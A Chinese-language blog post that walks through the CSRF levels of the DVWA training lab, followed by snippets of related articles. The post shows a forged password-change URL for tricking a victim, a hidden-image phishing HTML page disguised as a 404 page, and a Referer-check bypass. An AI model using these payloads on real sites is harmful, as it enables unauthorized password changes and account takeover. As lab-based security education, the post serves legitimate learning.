DVWA CSRF:Cross-site request forgery(跨站请求伪造)全等级

最新推荐文章于 2024-09-05 10:54:34 发布
最新推荐文章于 2024-09-05 10:54:34 发布
阅读量809 收藏
点赞数 1
分类专栏: DVWA笔记 文章标签: csrf 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49125123/article/details/122021566
版权

CSRF:Cross-site request forgery(跨站请求伪造)

目录:

本章使用的浏览器是Firefox63,由于浏览器和版本不同,复现结果可能不同

1.Low

这是一个修改用户密码的界面,查看url可以发现,修改新密码直接通过url传参给服务器

192.168.171.10/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change#

利用方法1:把密码改成自己需要的,然后把网址改成短网址,再欺骗用户点击,从而修改密码。

在这里插入图片描述

利用方法2:把下面网页放到钓鱼服务器上,然后诱导用户访问,访问之后密码就会被修改。

<!--CSRF.html-->

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <img src="http://192.168.171.10/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change#" border="0" style="display: none;"/>
    <h1>404 Not Found.</h1>
    <h2>hello world!</h2>
</body>
</html>

打开这个html文件

在这里插入图片描述

再次登录发现密码已经成功修改。

2.Medium

本等级的

Linux靶机ip为192.168.171.10

另一台Server 2003服务器ip为192.168.171.8

模拟的win 7客户机ip为192.168.171.2

HTTP Refererheader的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。

——百度百科

medium类型的代码在Low级别的基础上,加上了对用户请求头的中的Referer字段进行验证

源代码关键语句:

if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )

抓包内容:

在这里插入图片描述

SERVER_NAME对应着Host,HTTP_REFERER对应着Referer。

必须Referer里面有Host的内容才能修改密码,故方法一方法无效。

但是方法二还可以用。

可以把HTML文件修改成靶机ip地址,或者吧文件放到以靶机ip地址命名的的目录里,然后与host对住,就可以修改密码了。

修改之后抓包查看:

在这里插入图片描述

登录查看密码已经成功修改了。

3.High

配合XSS利用

4.Impossible

需要输入原密码才能修改密码,CSRF无解

CVE-柠檬i
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA关卡3:Cross Site Request Forgery (CSRF)(跨站请求伪造
m0_54899775的博客
12-06 711
DVWA关卡3:Cross Site Request Forgery (CSRF)(跨站请求伪造跨站请求伪造
DVWA系列---CSRF(Cross Site Request Forgery跨站请求伪造
野原新之助
01-26 674
文章目录一、前言CSRF二、Low级别1、演示2、源码三、Medium级别1、演示2、源码四、High级别1、演示 一、前言 CSRF CSRF(Cross Site Request Forgery)名为“跨站请求伪造”,意思是黑客伪装成用户的身份,利用目标服务器对用户的信任(即用户已经登入,且存有Cookie)进行数据请求或数据更,达到攻击的目的。 CSRF形成的原因: 1、用户在登陆了网站后...
DVWA-CSRF级别教程
weixin_44716769的博客
09-08 3630
CSRF Low等级 查看源码 服务器收到修密码的请求后,会检查参数password_new与password_conf是否相同,如果相同,就会修密码,并没有任何的防CSRF机制(当然服务器对请求的发送者是做了身份验证的,是检查的cookie,只是这里的代码没有体现)。 构造链接 http://192.168.0.103/vulnerabilities/csrf/?password_new=zuowenyang&password_conf=zuowenyang&Change=Chang
DVWA-CSRF跨站请求伪造 Medium和Low级别
xmj818719的博客
02-27 310
1代码分析 过滤条件 if( stripos( $SERVER[ 'HTTP_REFERER' ] ,$SERVER[ 'SERVER_NAME' ]) !== false ) 判断,$SERVER[ 'SERVER_NAME' ]在 $SERVER[ 'HTTP_REFERER' ] 中是否存在,寻找第一次出现的地址 $_SERVER[ ' SERVER_NAME' ] 网站的地址 192.168.0.9 $_SERVER[ 'HTTP_REFERER' ] 请求发起着地址 192.1.
DVWACSRF等级解析
Reset
06-15 1680
目录 0x00 介绍 0x01 low级别 0x02 mediu级别 0x03 high级别 0x04 impossible级别 0x00 介绍 DVWA中有很多账号,这些密码都是md5加密的,解密一下就可以了。因为涉及到两个账号,所以需要了解。 0x01 low级别 先更一个账户的密码,然后抓包看一下: 可以看到提交的新密码和确认密码都在url的参数中,用的GET方法,有referer的验证。但是这里referer的验证并没有什么用。所以直接构造攻击链接: http://
DVWACSRF详解
qq_43665434的博客
03-03 1286
DVWACSRF 一、low级别 1、测试流程 如图,输入一次新密码和一次确认新密码就可更密码,并没有索要旧密码进行验证。 用burp抓包看一下: 发现是get请求,而且并没有token,所以明显存在CSRF漏洞。 伪造一个请求链接: http://222.24.28.118/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change 将password_new和passw
Dvwa csrf之low、medium、high级别漏洞实战
永不垂头的博客
08-11 5146
Dvwa csrf低中高级别漏洞实战 Low 源代码如下: GLOBALS:引用局作用域中可用的部变量。GLOBALS :引用局作用域中可用的部变量。GLOBALS:引用局作用域中可用的部变量。GLOBALS 这种局变量用于在 PHP 脚本中的任意位置访问局变量(从函数或方法中均可)。PHP 在名为 $GLOBALS[index] 的数组中存储了所有局变量。变量的名字就是数组的键。 从源代码可以看出这里只是对用户输入的两个密码进行判断,看是否相等。不相等就提示密码不匹配。 相等的话,查看
DVWA-Cross Site Request Forgery (CSRF)
seanyang_的博客
10-26 312
CSRF攻击需要攻击者向用户发送恶意构造的链接,诱导用户点击后伪造合法用户的身份进行操作。初级CSRF渗透测试构造了第三方网站,实现了完整的攻击流程;中级CSRF渗透测试环境检查Referer参数中是否包含主机名,只需将文件名为主机名即可绕过该防护;高级CSRF渗透测试环境则使用了Anti-CSRF token进行防护,必须借助Burp Suite的第三方插件CSRF Token Tracker才可绕过。
DVWA Cross Site Request Forgery (CSRF) -------WP
weixin_45694388的博客
11-22 146
CSRF: CSRF跨站请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。 如下:其中Web A为存在CSRF漏洞的网站,Web B为攻击者构建的恶意网站,User C为Web A网站的合法用户。 low <?php i
DVWA系列之CSRF(跨站请求伪造)源码分析及漏洞利用
7Riven's blog
11-26 867
CSRF(Cross-site request forgery) CSRF称Cross-site request forgery跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、密等)。 CSRF与XSS最大的...
前端安全系列之二:如何防止CSRF攻击?
weixin_34416754的博客
10-12 372
背景 随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技术来增强安全性,但是仍存在很多潜在的威胁,这需要前端...
DVWACSRF_级别
weixin_45378289的博客
07-04 360
1.low级别 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) { // They do! $pass
bWAPP攻略
weixin_30480651的博客
04-22 1563
0x00、平台介绍 按照OWASP排序 0x01、A1-Injuction(注入) Low级别:不经过任何处理的接收用户数据 Medium级别:黑名单机制,转义了部分危险数据 High级别:部转义,或者白名单机制 1.1HTML Injection-Reflected(GET,POST) Low: Payload: <a href=”https://www...
Pikachu靶机系列之CSRF(Cross-Site Request Forgery
来到了学渣的博客
01-12 2369
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 本节目录: * 概述 * CSRF(get) * CSRF(post) * CSRF(token) 前文: Pikachu靶机系列之安装环境 Pikachu靶机系列之暴力破解(一) Pikachu靶机系列之暴破(二):token防爆破 Pikachu靶机...
跨站请求伪造CSRF (Cross-site request forgery)
太阳晒屁股了的博客
11-14 531
CSRF原理:CSRF跨站请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。 一,CSRF攻击流程:其中Web A...
57-java csrf防御方案
weixin_41775999的博客
09-01 349
当用户请求一个创建表单的页面时,服务器会生成一个唯一的令牌,并将其保存在session中,然后在表单中插入这个令牌。当用户提交表单时,服务器会检查表单中的令牌与session中的令牌是否一致,如果一致,则认为是合法的请求。服务器在响应中发送一个名为X-CSRF-Token的头信息,并要求客户端在后续的请求中将其作为X-CSRF-Token头信息进行发送。CSRF跨站请求伪造)是一种攻击手段,它迫使已登录用户的web应用在没有用户知情的情况下,发送未经授权的请求。通常,同步令牌是最简单且易于实现的方法。
通过组合Self-XSS + CSRF得到存储型XSS
最新发布
2301_80127209的博客
09-05 501
在一次漏洞赏金挖掘中,我在更用户名的功能点出发现了一个XSS,在修用户名的地方添加了一个简单的XSS payload并且刷新页面
在 eggjs 中忽略 CSRF
南城
09-02 411
通过以上方法,你可以在 Egg.js 中根据需要忽略 CSRF 保护。选择合适的方法来处理 CSRF 令牌问题,确保在禁用 CSRF 保护时考虑到安全性。
【网络安全CSRF漏洞—CSRF基础漏洞防御
goldfish8848的博客
09-01 1022
跨站点的请求请求伪造的(假装可信)Cross-Site Request Forgery跨站请求伪造。它是一种挟持用户在当前已登陆的Web应用程序上执行非本意的操作的攻击方法。同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。所以xyz.com下的js脚本采用ajax读取abc.com里面的文件数据会被拒绝同源策略限制了从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互。这是一个用于隔离潜在恶意文件的重要安全机制。
dvwa csrf高级
10-12
其中包含了多种不同类型的漏洞,包括 CSRF (Cross-site Request Forgery跨站请求伪造)漏洞。CSRF 高级攻击则是一种针对具有防御措施的 CSRF 漏洞的攻击方式,它需要攻击者更高的技术能力和对目标站点的深入了解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值